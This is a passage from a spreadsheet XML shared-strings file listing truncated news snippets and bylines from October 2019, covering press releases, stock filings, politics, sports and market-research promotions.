    <t>HONG KONG, Oct. 17, 2019 /PRNewswire/ -- Lenovo's (HKSE: 992) (ADR: LNVGY) exceptional monitors and messaging campaigns have cemented its...</t>
  </si>
  <si>
    <t>Wayne Farry</t>
  </si>
  <si>
    <t>He is at the Tory conference without the Tory whip for the first time in decades Dominic Grieve is one of the 21 Tory MPs to lose the party...</t>
  </si>
  <si>
    <t>Larson Electronics, a Texas-based company with over 40 years of experience spearheading the industrial lighting and equipment sectors,...</t>
  </si>
  <si>
    <t>Steve Zemek</t>
  </si>
  <si>
    <t>Sydney Roosters enforcer Jared Waerea-Hargreaves has refused to take a swipe at the NRL judiciary process, declaring he needs to be a...</t>
  </si>
  <si>
    <t>WASHINGTON, DC–The White House released a presidential proclamation entitled “Suspension of Entry of Immigrants Who Will Financially Burden...</t>
  </si>
  <si>
    <t>There's fresh evidence that eating a healthy diet, one that includes plenty of fruits and vegetables and limits highly processed foods, can...</t>
  </si>
  <si>
    <t>It looks like Hong Kong has crossed a rubicon – on an afternoon which used to be put aside for patriotic satisfaction. However the...</t>
  </si>
  <si>
    <t>Asset Dedication LLC raised its holdings in shares of Schwab Fundamental International Large Company Index (NYSEARCA:FNDF) by 2.8% in the...</t>
  </si>
  <si>
    <t>A Chinese steelmaking group has approached ministers with a renewed attempt to buy British Steel amid talks over a rescue led by Turkey's...</t>
  </si>
  <si>
    <t>St. Louis, MO, Oct. 18, 2019 (GLOBE NEWSWIRE) -- Board-certified bariatric surgeon Dr. Jay Michael Snow reports that he has performed...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 7, 2019 /PRNewswire/ -- Rosen Law Firm, a global investor rights law firm, reminds purchasers of the securities of Farfetch...</t>
  </si>
  <si>
    <t>Mumford &amp; Sons’ Ben Lovett has announced plans to launch a second London music venue. Having opened Omeara in Southwark in 2016, Lovett...</t>
  </si>
  <si>
    <t>MCLEAN, Va., Oct. 16, 2019 (GLOBE NEWSWIRE) -- Freddie Mac (OTCQB: FMCC) recently priced a new offering of Structured Pass-Through...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 18, 2019 /PRNewswire/ -- WeissLaw LLP is investigating possible breaches of fiduciary duty and other violations of law by...</t>
  </si>
  <si>
    <t>Steve Batterson sbatterson@qctimes.com</t>
  </si>
  <si>
    <t>Michigan defensive back Josh Metellus intercepts a pass intended for Iowa wide receiver Tyrone Tracy Jr. as Ambry Thomas (1) defends during...</t>
  </si>
  <si>
    <t>Last week Sen. Susan Collins joined with Sen. Maria Cantwell, D-Wash., and Reps. John Curtis, R-Utah, and Alan Lowenthal, D-Calif., to...</t>
  </si>
  <si>
    <t>Daren Butler</t>
  </si>
  <si>
    <t>Turkey says its forces have seized designated targets on the second day of an offensive against a Kurdish militia in Syria, after a...</t>
  </si>
  <si>
    <t>As more money flows into index-based stock mutual funds and ETFs, there may be less actively involved shareholders willing to push for...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / October 18, 2019 / Halper Sadeh LLP, a global investor rights law firm, continues to investigate the following...</t>
  </si>
  <si>
    <t>Aaron Cole</t>
  </si>
  <si>
    <t>Despite front seats that can adjust in up to 24 different ways, the 2020 Lincoln Corsair stands out among luxury compact crossovers because...</t>
  </si>
  <si>
    <t>Wiseguyreports.Com Adds “RFID Equipment - Market Demand, Growth, Opportunities, Manufacturers and Analysis of Top Key Players to 2022” To...</t>
  </si>
  <si>
    <t>Grant McArthur, Herald Sun</t>
  </si>
  <si>
    <t>Brian training can help overcome addiction to ice by replacing subconscious thoughts of drugs with something positive, according to a...</t>
  </si>
  <si>
    <t>BOUCHERVILLE, Quebec, Oct. 10, 2019 (GLOBE NEWSWIRE) -- Colabor Group Inc. (TSX: GCL) (“Colabor” or the “Company”) will release its results...</t>
  </si>
  <si>
    <t>ASG Staff</t>
  </si>
  <si>
    <t>There is unsettling loneliness that creeps into a person’s heart in the depths of winter. Maybe because the streets are cemetery quiet; not...</t>
  </si>
  <si>
    <t>Api Podder</t>
  </si>
  <si>
    <t>New $14.6 Million Weill Gift To Support Carnegie Hall’s Artistic and Educational Initiatives, Including Music Education and Teacher...</t>
  </si>
  <si>
    <t>Innovators &amp; Entrepreneurs Participate in Event Focused on ‘Skills for Scaling Your Business in 2020 &amp; Beyond’ DUBLIN --(BUSINESS WIRE)...</t>
  </si>
  <si>
    <t>A former taxi driver has avoided prison after hitting a cyclist in Melbourne's CBD because he didn't see a red light, leaving the rider...</t>
  </si>
  <si>
    <t>That Pokémon Sword and Shield’s setting is based on Britain is no secret, but it would seem that the inspiration behind the new titles...</t>
  </si>
  <si>
    <t>WASHINGTON (Reuters) - Fiat Chrysler Automobiles NV faces a $79 million U.S. civil penalty for failing to meet 2017 fuel economy...</t>
  </si>
  <si>
    <t>WiseGuyRerports.com Presents “Global Commercial Aerospace Avionics Market 2018 by Manufacturers, Regions, Type, and Application, Forecast...</t>
  </si>
  <si>
    <t>WASHINGTON, Oct. 17, 2019 /PRNewswire/ -- Gary Scanlon has joined KPMG LLP, the audit, tax and advisory firm, as a principal in the...</t>
  </si>
  <si>
    <t>PARIS: First place in Ligue 1 will be on the line on Saturday when leaders Paris Saint-Germain host their surprising challengers Angers at...</t>
  </si>
  <si>
    <t>Christopher P. Costa</t>
  </si>
  <si>
    <t>SUBHEAD</t>
  </si>
  <si>
    <t>(NAPSI)—With unemployment at a 50-year low, companies are eager to draw talent from a diverse pool of job seekers, and organizations have...</t>
  </si>
  <si>
    <t>Dalton Ross</t>
  </si>
  <si>
    <t>SPOILER ALERT: Read on only if you have already watched Sunday’s season 10 premiere of The Walking Dead. The Walking Dead was out of this...</t>
  </si>
  <si>
    <t>The last U.S. recession in 2008 was triggered by imbalances in the U.S. housing sector, but if there is another downturn in the near...</t>
  </si>
  <si>
    <t>BlackRock Inc. grew its position in WEX Inc (NYSE:WEX) by 1.5% during the 2nd quarter, according to its most recent filing with the...</t>
  </si>
  <si>
    <t>Glastonbury Marine Corps League</t>
  </si>
  <si>
    <t>From left: Malachi Knowles, Mike Monaco, Jon Debigare, Mike Monaco, and Jeremiah Knowles, ready to run the United We Run &amp; Ruck 5K in...</t>
  </si>
  <si>
    <t>LONDON &amp; PARIS &amp; HOUSTON --(BUSINESS WIRE) TechnipFMC (NYSE: FTI) (PARIS: FTI) announces that JFT – a consortium between JGC Corporation...</t>
  </si>
  <si>
    <t>Lundin Petroleum AB (Lundin Petroleum) is pleased to announce first oil from Phase 1 of the Johan Sverdrup field on the Utsira High in the...</t>
  </si>
  <si>
    <t>Sydney Roosters' chief supporters group are planning to drown out Canberra's Viking clap at Sunday's NRL grand final, refusing to join in...</t>
  </si>
  <si>
    <t>Democratic Representatives Alexandria Ocasio-Cortez and Ilhan Omar are endorsing Bernie Sanders for president.</t>
  </si>
  <si>
    <t>The Northern California Record</t>
  </si>
  <si>
    <t>The Superior Court of California for San Francisco County reported the following activities in the suit brought by Lendinghome Funding...</t>
  </si>
  <si>
    <t>NEW YORK, N.Y., Oct 14, 2019 (SEND2PRESS NEWSWIRE) -- EPIC Insurance Brokers and Consultants, a unique and innovative national retail...</t>
  </si>
  <si>
    <t>By Shannon Connellan</t>
  </si>
  <si>
    <t>We genuinely can't get enough of Hot Ones, and same goes for celebrities, even if they're not really sure why people do this to themselves....</t>
  </si>
  <si>
    <t>One of the best investments we can make is in our own knowledge and skill set. With that in mind, this article will work through how we can...</t>
  </si>
  <si>
    <t>State police say a person committed suicide Saturday night by jumping from the Occoquan River bridge on southbound Interstate 95. Police...</t>
  </si>
  <si>
    <t>MEADVILLE, Pa., Oct. 10, 2019 /PRNewswire-PRWeb/ -- "Shattered Dreams, Bondage, and Hope": a powerful narrative of a person who was driven...</t>
  </si>
  <si>
    <t>Houston pitcher Justin Verlander threw seven scoreless innings and Jose Altuve belted a two-run homer to propel the Astros to a 6-2 victory...</t>
  </si>
  <si>
    <t>This is a roundup of the day’s stories in brief. 1. EU, U.K. Reach Brexit Deal, But Parliament Approval Remains Uncertain Negotiators...</t>
  </si>
  <si>
    <t>PR Staff</t>
  </si>
  <si>
    <t>Montreal, Canada — October 3, 2019 — Focal, the French high fidelity manufacturing expert, celebrates its 40th anniversary in 2019. To...</t>
  </si>
  <si>
    <t>CHATTANOOGA, Tenn., Oct. 09, 2019 (GLOBE NEWSWIRE) -- You are invited by Astec Industries, Inc. (NASDAQ: ASTE) to participate in a...</t>
  </si>
  <si>
    <t>Park Press Printing offers impeccable printing solutions using quality printers in Dover and Concord, North Hampshire. Saugus, MA --...</t>
  </si>
  <si>
    <t>MADISON, Wis. (AP) — A Wisconsin appeals court has ruled that operating a riding mower while drunk carries the same penalties as driving a...</t>
  </si>
  <si>
    <t>Max Property Group (CURRENCY:MPG) traded up 11% against the U.S. dollar during the 24 hour period ending at 19:00 PM Eastern on October...</t>
  </si>
  <si>
    <t>Shruti Date Singh</t>
  </si>
  <si>
    <t>(Bloomberg) -- Chicago teachers have decided to strike in about two weeks, leaving investors in the city’s junk-rated school district...</t>
  </si>
  <si>
    <t>Mark Stachiew                        More from Mark Stachiew;Mark Stachiew;Mark Stachiew;Mark Stachiew</t>
  </si>
  <si>
    <t>The stars are so plentiful and so bright in the night sky above Grasslands National Park that the Milky Way is casting a shadow. I lie on...</t>
  </si>
  <si>
    <t>LONDON — Booker Prize winner Margaret Atwood is the bookies' favourite to win the coveted fiction trophy again for "The Testaments," her...</t>
  </si>
  <si>
    <t>U.S. stock index futures edged lower on Thursday, as high-level negotiators from the United States and China geared up to meet for the...</t>
  </si>
  <si>
    <t>10/15/2019 12:54 MOSCOW (Reuters) - Belarus briefly detained a Russian national who is under U.S. sanctions for her alleged role in cyber...</t>
  </si>
  <si>
    <t>Heritage Insurance (NYSE:HRTG) and BlackRock TCP Capital (NASDAQ:TCPC) are both small-cap finance companies, but which is the superior...</t>
  </si>
  <si>
    <t>News ‘I was so distraught’: Woman accidentally sells mother’s ashes in garage sale Rebecca Pocklington Oct 06, 2019 Share: A woman had a...</t>
  </si>
  <si>
    <t>SCOTTSDALE, Ariz., Oct. 14, 2019 /PRNewswire-PRWeb/ -- R3 Stem Cell, the nation's leader in hands on regenerative training, announced that...</t>
  </si>
  <si>
    <t>BEIRUT (AP) — The commander of the Syrian Kurdish-led forces says U.S. President Donald Trump did not oppose a deal his group made with...</t>
  </si>
  <si>
    <t>STOCKHOLM, Oct. 2, 2019 /PRNewswire/ -- SyncronTM, a provider of cloud-based after-sales service solutions focused on empowering the...</t>
  </si>
  <si>
    <t>Samantha Peters</t>
  </si>
  <si>
    <t>Lavender oils have many benefits for your skin. They can help calm redness and even reduce the appearance of blemishes. But did you know...</t>
  </si>
  <si>
    <t>CHICAGO, Oct. 14, 2019 /PRNewswire/ -- According to the new market research report "Hydrogen Energy Storage Market by State (Liquid, Gas,...</t>
  </si>
  <si>
    <t>PHOENIX, Oct. 7, 2019 /PRNewswire-PRWeb/ -- Schedule Viewer, LLC, the maker of MediRoutes software, the industry leader in Non-Emergency...</t>
  </si>
  <si>
    <t>By Philip Pullella VATICAN CITY (Reuters) - Pope Francis installed new cardinals on Saturday, putting his stamp on the future of the Roman...</t>
  </si>
  <si>
    <t>eilen</t>
  </si>
  <si>
    <t>I just want to put this theory out there.... Speaker Pelosi and other House leadership have stated they wish the impeachment investigation...</t>
  </si>
  <si>
    <t>Volatile organic compounds (VOCs) are an extensive range of carbon-based chemicals found in several naturally occurring and man-made solids...</t>
  </si>
  <si>
    <t>Hugh Blair, an 18th-century Scottish minister, wrote, “He who every morning plans the transaction of the day, and follows out that plan,...</t>
  </si>
  <si>
    <t>Story by Mix</t>
  </si>
  <si>
    <t>Welcome to CHEAP, our series about things that are good, but most of all, cheap. CHEAP! Let’s be honest: with the volume of pics we snap...</t>
  </si>
  <si>
    <t>Andrew Dalton</t>
  </si>
  <si>
    <t>LOS ANGELES — A man driving Kevin Hart's vintage muscle car accelerated recklessly on a Southern California highway, causing the accident...</t>
  </si>
  <si>
    <t>Logan Wallace</t>
  </si>
  <si>
    <t>Zacks Investment Research lowered shares of Diebold Nixdorf (NYSE:DBD) from a buy rating to a hold rating in a research report report...</t>
  </si>
  <si>
    <t>TORONTO, Oct. 16, 2019 (GLOBE NEWSWIRE) -- Toronto Real Estate Board President Michael Collins announced that Greater Toronto Area...</t>
  </si>
  <si>
    <t>Mavenir, the industry's only end-to-end cloud-native 4G and 5G network software provider for CSPs today announced the extension of its...</t>
  </si>
  <si>
    <t>“Make Your Mark” was Created by Nurys Pedersen, President of Careers In Nonprofits Founded in 2006, the nonprofit Washington DC staffing...</t>
  </si>
  <si>
    <t>OAKLAND, Calif. (AP) — When he got to second base, Yandy Diaz stole a glance back toward the dugout and saw all his teammates going crazy....</t>
  </si>
  <si>
    <t>gramps1942</t>
  </si>
  <si>
    <t>SRMX Got an email from our CEO a couple of days ago. We uploaded the agreement with my signature to DocuSign. Waiting to be final.Its...</t>
  </si>
  <si>
    <t>Enter on Twitter to win seats at one of Miami Beach's vegetarian or vegan restaurants MIAMI BEACH, Fla., Oct. 15, 2019 /PRNewswire/ --...</t>
  </si>
  <si>
    <t>M.W. Gale</t>
  </si>
  <si>
    <t>Good morning and welcome to “somebody said something in DC.” I’m M.W. Gale and today we’ll be talking about Pelosi’s latest comments on...</t>
  </si>
  <si>
    <t>A Champions League finalist for the first time just four months ago, Tottenham Hotspur are making history in Europe's top club competition...</t>
  </si>
  <si>
    <t>Analysts expect Lenovo Group Limited (OTCMKTS:LNVGY) to report $0.46 EPS on November, 6.They anticipate $0.18 EPS change or 64.29 % from...</t>
  </si>
  <si>
    <t>Annie Lee, Peter Martin and James Mayger, Bloomberg</t>
  </si>
  <si>
    <t>President Xi Jinping presided over a grand display of China's strength in Beijing -- declaring that no force could stop the country's rise...</t>
  </si>
  <si>
    <t>Brady Corporation (NYSE:BRC) Brady Corporation (NYSE:BRC) closed at $55.57 on the last trading session with an increase of 1.83%, whereas,...</t>
  </si>
  <si>
    <t>ROME (AP) — Italian lawmakers have backed a radical overhaul of the country’s parliament that will see around a third of them losing their...</t>
  </si>
  <si>
    <t>Costas Pitas</t>
  </si>
  <si>
    <t>LONDON (Reuters) - Meghan Markle, the wife of Britain’s Prince Harry, has started legal proceedings against the Mail on Sunday newspaper...</t>
  </si>
  <si>
    <t>LONDON (AP) — Prime Minister Boris Johnson says UK and EU have agreed ‘great new deal; urges Parliament to approve it this week.</t>
  </si>
  <si>
    <t>Hong Kong has been relatively calm for the past week, with only small, often colourful demonstrations, and Sunday's march will test the...</t>
  </si>
  <si>
    <t>Browse more detail information about this report visit at at...</t>
  </si>
  <si>
    <t>President Donald Trump on Friday announced that he's nominating Deputy Energy Secretary Dan Brouillette to replace Rick Perry. More From...</t>
  </si>
  <si>
    <t>SOURCE AT&amp;T Communications Agreements Cover About 20,000 Employees in Nine States in Southeast Region DALLAS, Oct. 1, 2019 /PRNewswire/...</t>
  </si>
  <si>
    <t>For the sixth consecutive year, Evercore ISI was recognized as the top ranked independent firm in Institutional Investor’s All-America...</t>
  </si>
  <si>
    <t>NASHVILLE, Tenn.–(BUSINESS WIRE)–Louisiana-Pacific Corporation (LP) (NYSE: LPX) will conduct its third quarter financial results webcast on...</t>
  </si>
  <si>
    <t>newsamed</t>
  </si>
  <si>
    <t>THE UK’s poorest pensioners receive an average of £2,600 less a year in state support than the richest, according to research. The...</t>
  </si>
  <si>
    <t>Texas A&amp;M quarterback Kellen Mond (11) looks to pass against Alabama during the first quarter of an NCAA college football game, Saturday,...</t>
  </si>
  <si>
    <t>A new, October report shows impressive successes with the City of Fort Lauderdale’s Inflow &amp; Infiltration Prevention Program; 61% of...</t>
  </si>
  <si>
    <t>By Dawson White</t>
  </si>
  <si>
    <t>A mother is suing an Illinois school district after she says school officials forced her 9-year-old son to stay outside in the cold without...</t>
  </si>
  <si>
    <t>SMITHS FALLS, ON and TORONTO, Oct. 2, 2019 /PRNewswire/ - Canopy Growth Corporation ("Canopy Growth" or the "Company") (TSX: WEED) (NYSE:...</t>
  </si>
  <si>
    <t>Originally posted on https://www.pptravel.com/blog/default.asp?ID=spains-tomatina-no-food-wastage-here According to statistics from the...</t>
  </si>
  <si>
    <t>By STEPHEN BRAUN Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Once again, President Donald Trump is seizing on unsubstantiated claims promoted by political allies as he seeks a...</t>
  </si>
  <si>
    <t>Stocks in Asia were set to trade lower on Wednesday amid mounting uncertainty on the U.S.-China trade front ahead of expected high level...</t>
  </si>
  <si>
    <t>Recently, officials from Wisconsin’s geographically largest county declared the second Monday in October to be Indigenous Peoples Day. “We...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) - The leaders of the 189-nation International Monetary Fund and its sister organization, the World Bank, are laying out...</t>
  </si>
  <si>
    <t>Oklahoma families and businesses saved just over $8 billion thanks to low-priced natural gas, created by a combination of increased energy...</t>
  </si>
  <si>
    <t>StorageCraft®, whose mission is to protect all data and ensure its constant availability, today announced that FeaturedCustomers named...</t>
  </si>
  <si>
    <t>The Kapehan body composed of heads of offices in the province is supporting the move for amendment in order to sustain and save the province being the "Rice Granary of the Cordilleras". (JDP/PAB-PIA CAR, Kalinga)</t>
  </si>
  <si>
    <t>CITY OF TABUK, Kalinga, Oct. 11 (PIA) - - Farmers in this city are calling on Congress to amend Republic Act 11203 or the Rice...</t>
  </si>
  <si>
    <t>The mother of an Adelaide driving instructor jailed for accepting cash bribes in exchange for licences has admitted her involvement in the...</t>
  </si>
  <si>
    <t>Aavy (Posted by)</t>
  </si>
  <si>
    <t>Director Quentin Tarantino is reportedly refusing to re-cut his film Once Upon a Time in Hollywood to please censors in Beijing, virtually...</t>
  </si>
  <si>
    <t>Rami Ayyub, Reuters</t>
  </si>
  <si>
    <t>Secretary of State Mike Pompeo has underscored US-Israeli efforts to counter Iran in talks with Prime Minister Benjamin Netanyahu in an...</t>
  </si>
  <si>
    <t>SOURCE: PayPal We recently hosted DICK’S Sporting Goods CEO Ed Stack at PayPal’s VP+ leadership team meeting in San Jose. I knew I also...</t>
  </si>
  <si>
    <t>Your Herald</t>
  </si>
  <si>
    <t>It’s our go-to whenever we take Grandad out; having spent a lifetime chasing the ultra-marathoner’s physique he’s pretty particular about...</t>
  </si>
  <si>
    <t>Test yourself to see how your finances would hold up if something bad happened.</t>
  </si>
  <si>
    <t>Much of the United States, including Maryland, will see warmer and wetter conditions this winter, according to the National Oceanic and...</t>
  </si>
  <si>
    <t>PhoneArena</t>
  </si>
  <si>
    <t>VANCOUVER, Oct. 4, 2019 /CNW/ - Trading resumes in: Company: Emerita Resources Corp. TSX-Venture Symbol: EMO (all issues) Resumption (ET):...</t>
  </si>
  <si>
    <t>SAN DIEGO, Calif., Oct. 18, 2019 /PRNewswire-PRWeb/ -- L7 Creative (https://www.l7creative.com) obtains Gold Level Certification in...</t>
  </si>
  <si>
    <t>James Gorsline</t>
  </si>
  <si>
    <t>The United States Securities and Exchange Commission wrapped up its fiscal year on September 30, 2019 with a flurry of enforcement actions...</t>
  </si>
  <si>
    <t>Allyson Rosell</t>
  </si>
  <si>
    <t>Mattel launched a new line of gender-inclusive dolls this past week. The line of dolls is under the name of ‘Creatable World’ and features...</t>
  </si>
  <si>
    <t>Agis F</t>
  </si>
  <si>
    <t>NASA’s InSight lander has detected on Mars some peculiar “dink and donk” sounds, thanks to an onboard seismograph. NASA’s InSight...</t>
  </si>
  <si>
    <t>Oct, Sat 19 2019 - 4:00 PM to 8:00 PM</t>
  </si>
  <si>
    <t>Former Millwall manager Neil Harris has broken his silence after leaving the Den, saying it was “the right decision at the right time” for...</t>
  </si>
  <si>
    <t>Sky News reporter Caroline Marcus has called out the “daft” behaviour of Extinction Rebellion protestors in London after they super-glued...</t>
  </si>
  <si>
    <t>Intelligencer Staff                        More from Intelligencer Staff</t>
  </si>
  <si>
    <t>Holly DewarDocFest ChairpersonBelleville Downtown DocFest will be happening the weekend of March 6 – 8, 2020. The popularity of this home...</t>
  </si>
  <si>
    <t>ALBANY, N.Y. (AP) — New York's governor says the state has seen its first reported death linked to vaping. Democratic Gov. Andrew Cuomo...</t>
  </si>
  <si>
    <t>By David Walsh</t>
  </si>
  <si>
    <t>Demolition is about to start which will pave the way for a £61m flats complex in Sheffield city centre, as demand for purpose-built...</t>
  </si>
  <si>
    <t>Nicole Bruce</t>
  </si>
  <si>
    <t>Well-Being Workout If you devote so much attention to daily obligations and physical health that you often neglect your emotional...</t>
  </si>
  <si>
    <t>The "US Automated Microbiology Market for over 100 Tests" report has been added to ResearchAndMarkets.com's offering. This report is an...</t>
  </si>
  <si>
    <t>The Belfast woman was missing for more than 30 years before a member of the public found her remains on a Co Louth beach.</t>
  </si>
  <si>
    <t>Chandler Reeves</t>
  </si>
  <si>
    <t>Caroline Jones co-produced her forthcoming EP, Chasin’ Me, due out October 18th, with Grammy and Academy Award-winning producer Ric Wake...</t>
  </si>
  <si>
    <t>UE.co, a digital marketing company renowned in the insurance industry for its digital traffic platform and marketing services, celebrated...</t>
  </si>
  <si>
    <t>The National Park Service says a copper bust of aviation pioneer Orville Wright has been stolen from the Wright Brothers National Memorial...</t>
  </si>
  <si>
    <t>Robbie Slater, The Sunday Telegraph</t>
  </si>
  <si>
    <t>Little more than one round into the new season and already it’s clear there’s no shortage of young talent coming through the A-League’s...</t>
  </si>
  <si>
    <t>CalMatters, News Partner</t>
  </si>
  <si>
    <t>COMMENTARY: Newsom made some progress on some of his campaign promises, but what he called "big hairy, audacious goals" remain elusive.</t>
  </si>
  <si>
    <t>WASHINGTON, Oct. 9, 2019 /PRNewswire/ -- The Employee Ownership Foundation today announced that Cindy Turcot, a longstanding leader in the...</t>
  </si>
  <si>
    <t>Caused by inflammation of the plantar fascia, it is a fibrous sheet in the sole of your foot which helps maintain the arch. Mr Sajid...</t>
  </si>
  <si>
    <t>A festival-goer had MDMA, cocaine and ketamine in her system when she died, a coroner heard. An inquest into the death of 17-year-old Anya...</t>
  </si>
  <si>
    <t>Love Island winner Amber Gill has suggested Strictly Come Dancing’s Alex Scott needs more “energy” and “sass” if she is to sail through...</t>
  </si>
  <si>
    <t>Dish Detergent Market 2019 Report gives a complete analysis of industry based on definition, product specifications, market gains, key...</t>
  </si>
  <si>
    <t>Pelion Middle School 6th grader charged with threatening student Oct 6, 2019 8:52 PM EDT...</t>
  </si>
  <si>
    <t>Olivia Kennah</t>
  </si>
  <si>
    <t>Adorable &amp; Adoptable Pets of the Week is made possible by our great sponsors at Mountainaire Animal Clinic, your go-to place for all of...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / October 7, 2019 / The Klein Law Firm announces that class action complaints have been filed on behalf of...</t>
  </si>
  <si>
    <t>BEIJING (AP) — China announced a timetable Friday for carrying out a promise to allow full foreign ownership of some finance businesses,...</t>
  </si>
  <si>
    <t>0 comment Scotland boss Steve Clarke was impressed by Lawrence Shankland’s overall performance as the Dundee United striker scored on his...</t>
  </si>
  <si>
    <t>By: Michael Springer , Katlyn Brieskorn</t>
  </si>
  <si>
    <t>DAYTONA BEACH, Fla. - Some Daytona Beach homeowners said they know why their homes keep flooding, but no one will fix it. Residents said...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 11, 2019 (GLOBE NEWSWIRE) -- Exxe Group, Inc. (OTC PINK: AXXA), a diversified company focused on synergistic acquisitions...</t>
  </si>
  <si>
    <t>xEURO (CURRENCY:xEUR) traded 0.1% lower against the U.S. dollar during the 24 hour period ending at 23:00 PM E.T. on October 14th. During...</t>
  </si>
  <si>
    <t>Online PR Media</t>
  </si>
  <si>
    <t>Influential Drones and Autel Robotics have partnered together to provide the Rare Species Fund with drones that will be used to protect...</t>
  </si>
  <si>
    <t>Stand for Truth airs its 131st episode on Monday, October 14, 2019, with Atom Araullo, Richard Heydarian, and Joyce Pring. The newscast...</t>
  </si>
  <si>
    <t>This recently published report examines the global Anesthetic Analyzers market for the projected period of 7-years, i.e. between 2019 and...</t>
  </si>
  <si>
    <t>TORONTO, Oct. 17, 2019 (GLOBE NEWSWIRE) -- iSIGN Media Solutions Inc. (“iSIGN” or “Company”) (TSX-V: ISD) (OTC: ISDSF), a leading...</t>
  </si>
  <si>
    <t>The White House has said it has chosen US President Donald Trump’s golf resort in Miami as the site for next year’s G7 summit. The...</t>
  </si>
  <si>
    <t>Bank of America Corp DE cut its holdings in shares of Cincinnati Financial Co. (NASDAQ:CINF) by 1.5% in the 2nd quarter, according to its...</t>
  </si>
  <si>
    <t>Louisiana-Pacific Corporation (LP, NYSE: LPX) announced today that it has acquired the prefinishing assets at a Granite City, Ill.,...</t>
  </si>
  <si>
    <t>JM Internet Group is preparing a new, 2020 edition of the Social Media Marketing Workbook along with tools and Youtube videos. SAN JOSE,...</t>
  </si>
  <si>
    <t>ConocoPhillips has agreed to sell its northern Australian business to partner Santos Ltd for $1.39 billion, in a deal that will hike the...</t>
  </si>
  <si>
    <t>Galatasaray’s comeback was left incomplete.</t>
  </si>
  <si>
    <t>(MENAFN - Gulf Times) Signs of progress in US-China trade talks sent stocks to the biggest gain in a week and had Wall Street handicappers...</t>
  </si>
  <si>
    <t>Sophia Bernazzani</t>
  </si>
  <si>
    <t>These days, social media is all about documentation. Where you go, what you eat and drink, who you see, and what's most memorable: These...</t>
  </si>
  <si>
    <t>Meet award-winning author and journalist Hank Phillippi Ryan up close and personal in this open forum setting.</t>
  </si>
  <si>
    <t>The Report Contains Current Scenario of The Daily Wear Contact Lenses Industry And Encompasses Discussion Various Prime Factors Related To...</t>
  </si>
  <si>
    <t>By Jan Strupczewski Reuters WASHINGTON (Reuters) - The European Union, China, India and several other countries teamed up on Friday to...</t>
  </si>
  <si>
    <t>NashvilleTicketBrokers.com carries a vast selection of Mannheim Steamroller concert tickets at affordable prices. Mannheim Steamroller...</t>
  </si>
  <si>
    <t>IDG Asia</t>
  </si>
  <si>
    <t>GUANGZHOU, China, Oct. 14, 2019 /PRNewswire/ -- As a variety of artificial intelligence (AI) applications are being implemented, AI is...</t>
  </si>
  <si>
    <t>MERRITT, B.C. — A young bull moose has been illegally shot, killed and abandoned in B.C.’s southern Interior and conservation officers hope...</t>
  </si>
  <si>
    <t>Stavanger, Norway, 5 October 2019 -- On 5 October Equinor and the Johan Sverdrup partnership consisting of Lundin Norway, Petoro, Aker BP...</t>
  </si>
  <si>
    <t>Patricia Zengerle and Lisa Lambert</t>
  </si>
  <si>
    <t>facebookSHARE twitterTWEET email whatsapp US Secretary of State Mike Pompeo has objected to a Democrat request for depositions from...</t>
  </si>
  <si>
    <t>Tom Withers, Ap Sports Writer</t>
  </si>
  <si>
    <t>CLEVELAND (AP) — London Fletcher looked down and traced his unlikely path to football stardom. From more than 1,000 feet above his...</t>
  </si>
  <si>
    <t>Oct, Wed 9 2019 - 6:00 PM to 8:00 PM</t>
  </si>
  <si>
    <t>ST-BERNARD-DE-LACOLLE, Que. — Andrew Scheer brought his national campaign to the edge of the U.S. border, where he pledged to shut a legal...</t>
  </si>
  <si>
    <t>By Caitlyn Kelleher</t>
  </si>
  <si>
    <t>When you've been around as long as most New England towns you're bound to have some scary stories.</t>
  </si>
  <si>
    <t>Maxim Integrated Products Inc. (NASDAQ:MXIM) CEO Tunc Doluca sold 14,000 shares of the company’s stock in a transaction that occurred on...</t>
  </si>
  <si>
    <t>Gaby Galvin</t>
  </si>
  <si>
    <t>A San Francisco-based startup has developed technology that it hopes will make finding an electric scooter a whole lot easier.</t>
  </si>
  <si>
    <t>Greenberg Traurig, LLP’s Boston office celebrated its 20th year with an anniversary and alumni reception. The event brought together more...</t>
  </si>
  <si>
    <t>The global infectious disease diagnostics market is valued at USD 14,725.7 million in 2017 and is expected to grow at CAGR of 5.6% to USD...</t>
  </si>
  <si>
    <t>College Basketball: Carlisle grad Deshawn Millington joins Division II Tuskegee</t>
  </si>
  <si>
    <t>TORONTO (AP) — Jamaican dancehall reggae artist and actor Louie Rankin, known for his 1992 hit "Typewriter," died in a car crash involving...</t>
  </si>
  <si>
    <t>Smoke from the Saddleridge Fire hangs above power lines as the sun rises in Newhall, Calif., on Friday, Oct. 11, 2019. An aggressive...</t>
  </si>
  <si>
    <t>A civilian employee raged through a Paris police headquarters with a knife, stabbing four colleagues to death before he was shot and killed.</t>
  </si>
  <si>
    <t>Todd Cummins</t>
  </si>
  <si>
    <t>A candle shined bright in honor of women, men, and children who tragically died because of domestic violence. For 25 years, Crossroad...</t>
  </si>
  <si>
    <t>Rachel Chamberlain</t>
  </si>
  <si>
    <t>THE National Motor Racing Museum is seeing one of its busiest Bathurst 1000 weekends yet. With its prominent location alongside Murray's...</t>
  </si>
  <si>
    <t>CRANE CO. Building of Memphis today announced it has completed renovations and conversion of its fifth floor at 254 Court Ave., Memphis,...</t>
  </si>
  <si>
    <t>Originally posted on https://www.411disaster.com/blog/when-disaster-strikes-common-causes-of-water-damage-in-california/ California is no...</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 7, 2019 /PRNewswire/ -- The "Semiconductor Market Report: Trends, Forecast and Competitive Analysis" report has been added to...</t>
  </si>
  <si>
    <t>SAN DIEGO, Oct. 15, 2019 /PRNewswire/ -- Immunic, Inc. (Nasdaq: IMUX), a clinical-stage biopharmaceutical company focused on developing...</t>
  </si>
  <si>
    <t>On this episode of The Ron Burgundy Podcast, Ron Burgundy is so excited to welcome model, actress, and icon Brooke Shields to the studio...</t>
  </si>
  <si>
    <t>FREDERICK, Md., Oct. 2, 2019 /PRNewswire-PRWeb/ -- The 4th Annual DoGood-er Awards event will be held at The Arc at Market Street, 555...</t>
  </si>
  <si>
    <t>THIS NEWS RELEASE IS NOT FOR DISTRIBUTION TO U.S. NEWSWIRE SERVICES OR FOR DISSEMINATION IN THE UNITED STATES</t>
  </si>
  <si>
